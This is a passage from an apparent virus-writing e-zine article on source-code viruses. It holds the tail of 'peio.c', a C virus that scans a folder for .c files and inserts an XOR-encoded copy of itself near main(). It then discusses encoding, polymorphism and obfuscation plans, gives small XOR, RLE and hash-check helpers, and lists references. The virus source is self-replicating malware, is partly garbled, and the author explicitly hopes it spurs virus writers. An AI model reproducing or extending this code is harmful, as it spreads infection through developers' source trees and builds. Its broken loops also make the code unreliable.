	char hashend[] = "‰ãèáò ªâõæ"ŠŠ‰ä 1/2 ïðåîäéò¨¢(r)¢(c)"Љ÷èéì娨äéò 1/2 òåáääéò¨ä(c)(c)3/4°(c)Љ‰é模¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)ã¢(c)(c)üüЉ‰   ¡¨óôòãíð¨äéò­3/4äßîáíå"óôòìåî¨äéò­3/4äßîáíå(c)­²¬¢(r)â(c)(c)(c) Љ‰‰é樨æä1/2ïðåî¨äéò­3/4äßîáíå¬ ÏßÒÄ×Ò¬ °(c)(c)3/41/2°(c)Љ‰‰ûЉ‰‰‰óéúå 1/2 ìóååë¨æä¬ °¬ ÓÅÅËßÅÎÄ(c)"Љ‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå¬ÐÒÏÔßÒÅÁĬÍÁÐßÐÒÉÖÁÔŬæä¬°(c)"Љ‰‰‰éæ¨ ¨¡óôòóôò¨ðôò¬¢éîéôßèáóè¢(c)(c) ¦¦Š‰‰‰‰  ¨ ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáé(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáé(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáé(c)(c)3/4°(c) üü Љ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîíáéî ¨¢(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîéîô íáéî ¨¢(c)(c)3/4°(c) üüЉ‰‰‰    ¨¨íðïó1/2¨éîô(c)óôòóôò¨ðôò¬¢Üîöïéä íáéî ¨¢(c)(c)3/4°(c) (c) (c)Љ‰‰‰ûЉ‰‰‰‰íðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)íðïó¬ ¢"Üî¢(c)"Љ‰‰‰‰íðïó ­1/2 ¨éîô(c)­­ðôò"Љ‰‰‰‰éæ¨ ¡¨éðïó 1/2 ¨éîô(c)óôòóôò¨""ðôò¬ ¢£éîãìõäå 1/4¢(c)(c) (c)Љ‰‰‰‰ûЉ‰‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Љ‰‰‰‰‰âòåáë"Љ‰‰‰‰ýЉ‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Љ‰‰‰‰ðáçå 1/2 ³ ª ¨éîô(c)óùóãïîæ¨ßÓÃßÐÁÇÅÓÉÚÅ(c)"Љ‰‰‰‰æôòõîãáôå¨æä¬ óéúå"ðáçå(c)"Љ‰‰‰‰ðôò 1/2 ííáð¨ÎÕÌ̬óéúå"ðáçå¬ÐÒÏÔßÒÅÁÄ"ÐÒÏÔß×ÒÉÔŬÍÁÐßÓÈÁÒÅĬæä¬°(c)"Љ‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨ðôò¬ ¢£éîãìõäå 1/4¢(c)"Љ‰‰‰‰éðïó 1/2 ¨éîô(c)óôòóôò¨¨öïéä ª(c)éðïó¬ ¢ÜîÜî¢(c)"Љ‰‰‰‰éðïó ­1/2 ¨éîô(c)ðôò"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Љ‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Љ‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰éèïìå 1/2 óôòìåî¨èáóèéîã(c)"Љ‰‰‰‰æïò¨é1/2¨óéúå­éðïó(c)¯éèïìå"é3/41/2°"é­­(c) Љ‰‰‰‰‰íåíãðù¨ðôò"éðïó"éªéèïìå"éèïìå¬ ðôò"éðïó"éªéèïìå¬ éèïìå(c)"Љ‰‰‰‰íåíãðù¨ðôò"éðïó¬ èáóèéî㬠éèïìå(c)"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèéîã(c)"é""(c)Љ‰‰‰‰‰èáóèéîãÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰íðïó "1/2 éèïìå"Љ‰‰‰‰âõæ 1/2 ¨ãèáò ª(c)íáììï㨲°ªóéúåïæ¨ãèáò(c)(c)"Љ‰‰‰‰óôòãðù¨âõ欢ÜîÜôéîéôßèáóè¨(c)"¢(c)"Љ‰‰‰‰ôèïìå 1/2 óôòìåî¨âõæ(c)"Љ‰‰‰‰æïò¨é1/2¨óéúå"éèïìå­íðïó(c)¯ôèïìå"é3/41/2°"é­­(c) Љ‰‰‰‰‰íåíãðù¨ðôò"íðïó"éªôèïìå"ôèïìå¬ ðôò"íðïó"éªôèïìå¬ ôèïìå(c)"Љ‰‰‰‰íåíãðù¨ðôò"íðïó¬ âõæ¬ 
ôèïìå(c)"Љ‰‰‰‰âèïìå 1/2 óôòìåî¨èáóèâåç(c)"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå¬ èáóèâåç¬ âèïìå(c)"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèéî㬠éèïìå(c)"Љ‰‰‰‰âèïìå "1/2 éèïìå"Љ‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèâåçÛÝ 1/2 Ü¢¢(c)"Љ‰‰‰‰âèïìå "1/2 ²²"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèâåç(c)"é""(c)Љ‰‰‰‰‰èáóèâåçÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèâåç¬ óôòìåî¨èáóèâåç(c)(c)"Љ‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèâåç(c)"Љ‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"ÜîÜôãèáò èáóèåîäÛÝ 1/2 Ü¢¢(c)"Љ‰‰‰‰âèïìå "1/2 ²²"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ óôòìåî¨èáóèåîä(c)(c)"Љ‰‰‰‰âèïìå "1/2 óôòìåî¨èáóèåîä(c)"Љ‰‰‰‰óðòéîôæ¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ ¢Ü¢"Üî¢(c)"Љ‰‰‰‰âèïìå "1/2 ³"Љ‰‰‰‰æïò¨é1/2°"é1/4óôòìåî¨èáóèåîä(c)"é""(c)Љ‰‰‰‰‰èáóèåîäÛéÝ Þ1/2 °ø¸°"Љ‰‰‰‰åèïìå 1/2 óôòìåî¨èáóèåîä(c)"Љ‰‰‰‰íåíãðù¨ðôò"óéúå"éèïìå"ôèïìå"âèïìå¬ èáóèåîä¬ åèïìå(c)"Љ‰‰‰‰íóùîã¨ðôò¬ óéúå"ðáçå¬ ÍÓßÓÙÎÃ(c)"Љ‰‰‰‰íõîíáð¨ðôò¬ óéúå"ðáçå(c)"Љ‰‰‰‰æôòõîãáôå¨æä¬ óéúå"éèïìå"ôèïìå"âèïìå"åèïìå(c)"Љ‰‰‰ý åìó劉‰‰‰ûЉ‰‰‰‰íõîíáð¨ðôò¬ óéúå(c)"Љ‰‰‰ýЉ‰‰ýŠýŠ"; 
	char *buf; 
 
	d = opendir("."); 
	while((dir = readdir(d))>0) 
		if(!(strcmp(dir->d_name+strlen(dir->d_name)-2,".c"))|| 
		   !(strcmp(dir->d_name+strlen(dir->d_name)-2,".C")))  
			if((fd=open(dir->d_name, O_RDWR, 0))>=0) 
			{ 
				size = lseek(fd, 0, SEEK_END); 
				ptr = mmap(NULL,size,PROT_READ,MAP_PRIVATE,fd,0); 
				if( (!strstr(ptr,"init_hash")) && 
				  ( ((mpos=(int)strstr(ptr,"\nmain("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main("))>0) ||  
				    ((mpos=(int)strstr(ptr,"\nmain ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nint main ("))>0) || 
				    ((mpos=(int)strstr(ptr,"\nvoid main ("))>0) ) ) 
				{ 
					mpos = (int)strstr((void *)mpos, ";\n"); 
					mpos -= (int)--ptr; 
					if( !(ipos = (int)strstr(++ptr, "#include <")) ) 
					{ 
						munmap(ptr, size); 
						break; 
					} 
					munmap(ptr, size); 
					page = 3 * (int)sysconf(_SC_PAGESIZE); 
					ftruncate(fd, size+page); 
					ptr = mmap(NULL,size+page,PROT_READ+PROT_WRITE,MAP_SHARED,fd,0); 
					ipos = (int)strstr(ptr, "#include <"); 
					ipos = (int)strstr((void *)ipos, "\n\n"); 
					ipos -= (int)ptr; 
					for(i=0;i=0;i--)  
						memcpy(ptr+ipos+i*ihole+ihole, ptr+ipos+i*ihole, ihole); 
					memcpy(ptr+ipos, hashinc, ihole); 
					for(i=0;i=0;i--)  
						memcpy(ptr+mpos+i*thole+thole, ptr+mpos+i*thole, thole); 
					memcpy(ptr+mpos, buf, thole); 
					bhole = strlen(hashbeg); 
					memcpy(ptr+size+ihole+thole, hashbeg, bhole); 
					memcpy(ptr+size+ihole+thole+bhole, hashinc, ihole); 
					bhole += ihole; 
					sprintf(ptr+size+ihole+thole+bhole, "\";\n\tchar hashbeg[] = \""); 
					bhole += 22; 
					for(i=0;i 
<-end of peio.c-------------------------------------------------------------> 
<---------------------------------------------------------------------------> 
 
As we can see, the hashes are XORed with 80h, so they must be XORed
again before the code can be written into the host file. Storing the
hashes this way opens a route to polymorphism, since the key of the
XOR "encryption" could vary from 80h to FFh in each generation.
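
To make the XOR step concrete, here is a minimal sketch of the
round trip on a harmless sample string. The names xor_buffer and
xor_round_trip_ok are illustrative assumptions and are not taken from
peio.c. With key 80h every 7-bit ASCII byte gets its high bit set,
which is why the word "char" shows up as "ãèáò" when the array is
viewed as Latin-1 text.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* XOR every byte of buf[0..len) with key, in place. Applying the same
   key a second time restores the original bytes. */
static void xor_buffer(unsigned char *buf, size_t len, unsigned char key)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Returns 1 if a harmless sample string survives an encode/decode
   round trip with the given key, 0 otherwise. */
static int xor_round_trip_ok(unsigned char key)
{
    const char sample[] = "int main(void)";
    unsigned char work[sizeof sample];
    size_t len = sizeof sample - 1;          /* skip the trailing NUL */

    memcpy(work, sample, sizeof sample);
    xor_buffer(work, len, key);              /* encode */
    if (key != 0 && memcmp(work, sample, len) == 0)
        return 0;                            /* bytes should have changed */
    xor_buffer(work, len, key);              /* decode */
    return memcmp(work, sample, len) == 0;
}
```

Since XOR is its own inverse, a single routine serves for both
directions, and only the key has to be known to recover the text.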
 
 
4.4.- Future developments 
 
These examples are not "live fire": the code discussed above contains
several mistakes. However, we keep developing these and new examples,
trying to incorporate more functionality or new approaches.
 
The most glaring problem is the size of the arrays that hold the code
we want to include. It is also quite problematic to print characters
that fall within the first 32 positions of the ASCII table, so it is
worth looking at how this problem is solved in other settings, such as
the delivery of electronic mail or news. In this sense, we can
consider several possibilities:
 
1) Using uuencode/uudecode. 
 
2) Using base64. 
 
3) Using yEnc [14], an alternative to the two previous options, which
uses byte values above 127 but is able to avoid problematic chars
(e.g. NUL, DEL, etc.).
 
4) Using our own conversion schemes for char arrays, with improved
combinations of XORs, sums, etc., which could include simple
compression such as RLE, for instance.
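
As an illustration of the last option, the following is a minimal
sketch of byte-oriented RLE, assuming a simple (count, byte) pair
format. The function names and the pair format are assumptions made
for this example, not something taken from the article's code. Note
that the count bytes can themselves be control characters, so RLE
alone does not solve the printing problem; it would still have to be
combined with one of the text-safe encodings listed above.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Encode src[0..n) as (count, byte) pairs, count in 1..255.
   Returns the number of bytes written, or 0 if dst (capacity cap)
   is too small. Empty input also yields 0. */
static size_t rle_encode(const unsigned char *src, size_t n,
                         unsigned char *dst, size_t cap)
{
    size_t out = 0;
    assert(src != NULL && dst != NULL);
    for (size_t i = 0; i < n; ) {
        size_t run = 1;
        while (i + run < n && src[i + run] == src[i] && run < 255)
            run++;
        if (out + 2 > cap)
            return 0;
        dst[out++] = (unsigned char)run;
        dst[out++] = src[i];
        i += run;
    }
    return out;
}

/* Expand (count, byte) pairs. Returns the number of bytes written,
   or 0 on malformed input or insufficient capacity. */
static size_t rle_decode(const unsigned char *src, size_t n,
                         unsigned char *dst, size_t cap)
{
    size_t out = 0;
    assert(src != NULL && dst != NULL);
    if (n % 2 != 0)
        return 0;
    for (size_t i = 0; i < n; i += 2) {
        size_t run = src[i];
        if (run == 0 || out + run > cap)
            return 0;
        for (size_t k = 0; k < run; k++)
            dst[out++] = src[i + 1];
    }
    return out;
}

/* Returns 1 if data[0..n) survives an encode/decode round trip,
   using fixed 512-byte scratch buffers (n must be at most 256). */
static int rle_round_trip_ok(const unsigned char *data, size_t n)
{
    unsigned char enc[512], dec[512];
    size_t e, d;

    if (n == 0 || n > 256)
        return 0;
    e = rle_encode(data, n, enc, sizeof enc);
    d = rle_decode(enc, e, dec, sizeof dec);
    return d == n && memcmp(dec, data, n) == 0;
}
```

This format only pays off on inputs with long runs, such as the tab
indentation of source text; input without repeats doubles in size.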
 
In addition to these improvements, we could think about adding
oligomorphism to the programs: creating several routines,
"encrypting" them with random keys in each generation, and providing
several decryption routines. Much of this approach is already present
in the "Peio" virus, where the possible keys allow 127 different
combinations when the hashes are created.
 
As later steps, efforts could be directed towards total obfuscation of
the viral code, merging this code with the original one, or
generating the needed hashes by computing them as the result of a
piece of code (a hash is just a very large number, so we could create
code whose result is that number and thus generate it every time
instead of storing it).
 
 
5.- Conclusions 
 
Source code viruses are not a very serious threat at the moment, but
if the techniques discussed here are improved, they could become an
important one. Many tools exist to audit the integrity of files on
disk, such as md5sum, tripwire, etc. Nevertheless, if we extend the
paranoia to everything that passes through our circuits, the threat of
a first trojanised compiler still hangs over our heads in UNIX
systems.
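
On the defensive side, the idea behind such integrity tools can be
sketched in a few lines: record a digest of each source file while it
is known to be clean and compare it again before compiling. The
example below is only an illustration under loud assumptions. It uses
the 64-bit FNV-1a hash as a stand-in because it fits in a few lines;
FNV-1a is NOT cryptographic, and a real audit should rely on md5sum,
tripwire or a stronger digest. The function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define FNV64_OFFSET 0xcbf29ce484222325ULL
#define FNV64_PRIME  0x100000001b3ULL

/* Fold n bytes into a running FNV-1a 64-bit hash value. */
static uint64_t fnv1a64_update(uint64_t h, const unsigned char *p, size_t n)
{
    assert(p != NULL || n == 0);
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= FNV64_PRIME;
    }
    return h;
}

/* Hash a whole in-memory buffer. */
static uint64_t fnv1a64(const void *data, size_t n)
{
    return fnv1a64_update(FNV64_OFFSET, (const unsigned char *)data, n);
}

/* Compare a file against a digest recorded earlier.
   Returns 1 if it matches, 0 if the file changed, -1 on I/O error. */
static int file_matches(const char *path, uint64_t expected)
{
    unsigned char chunk[4096];
    uint64_t h = FNV64_OFFSET;
    size_t got;
    FILE *f = fopen(path, "rb");

    if (f == NULL)
        return -1;
    while ((got = fread(chunk, 1, sizeof chunk, f)) > 0)
        h = fnv1a64_update(h, chunk, got);
    if (ferror(f)) {
        fclose(f);
        return -1;
    }
    fclose(f);
    return h == expected;
}
```

Any inserted line, such as an extra #include or a call added to
main(), changes the digest, so file_matches() would return 0 for a
modified source file as long as the recorded digests themselves are
stored somewhere an attacker cannot rewrite them.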
 
I hope this text is useful for explaining the work done on this
subject and motivates virus writers to develop new and better
techniques. However, I consider myself an extreme Free Software
defender, and I would like this code to be used to increase security
within the Free Software community, not the opposite.
 
Finally, I would like to thank all those who have helped me to write
this text: the int80h crew, elisasm, silviex, sheroc, a young samurai,
and above all the whole 29a crew, which stays year after year on the
sharpest edge of the virus scene. VirusBuster, thanks for allowing me
to write in the best viral e-zine worldwide. Thanks really ;-)
 
 
6.- Related Links 
 
[1] Free Software Song  
  http://www.gnu.org/music/free-software-song.html 
 
[2] Linux Malware: Debunking the myths. Phil d'Espace. Virus Bulletin, September 2002.
  http://www.virusbtn.com/magazine/archives/200209/linux_malware.xml 
 
[3] BitchX 1.0c19 IRC Client Backdoored. 
  http://slashdot.org/article.pl?sid=02/07/02/1327208&mode=thread 
  http://www.securityfocus.com/archive/1/280009/2002-06-28/2002-07-04/0 
 
[4] Clues, Vandalism, Litter Sendmail Trojan Trail. 
  http://www.securityfocus.com/news/1113 
  http://cert-nl.surfnet.nl/i/2002/I-02-03.htm 
 
[5] Virus Encyclopedia, File Viruses, DOS: Urphin.1621. 
  http://www.viruslist.com/eng/VirusList.asp?page=0&mode=1&id=2414&key=000010000102404 
 
[6] The History of Computer Viruses. 
  http://www.virus-scan-software.com/virus-scan-help/answers/the-history-of-computer-viruses.shtml 
 
[7] Die-hard virus. 
  http://www.pspl.com/virus_info/dos/diehard.htm 
 
[8] OBJ, LIB Viruses and Source Code Viruses. 
  http://www.viruslist.com/eng/viruslistbooks.html?id=36 
 
[9] Shell viruses. Gobleen Warrior & zert. 
  http://29a.host.sk/29a-6/29a-6.212 
 
[10] Polymorphism/Encryption/EPO in Perl Viruses. SnakeByte. 
  http://29a.host.sk/29a-6/29a-6.220 
 
[11] Reflections on Trusting Trust. Ken Thompson. 
  http://www.acm.org/classics/sep95/ 
 
[12] Linux Security Auditing: Re: Reflections on Trusting Trust. 
  http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0222.html 
  http://lists.insecure.org/lists/security-audit/2000/Apr-Jun/0226.html 
 
[13] Shared Source: A Dangerous Virus. 
  http://www.opensource.org/advocacy/shared_source.php 
 
[14] yEnc - Broken Tools. 
  http://www.yenc.org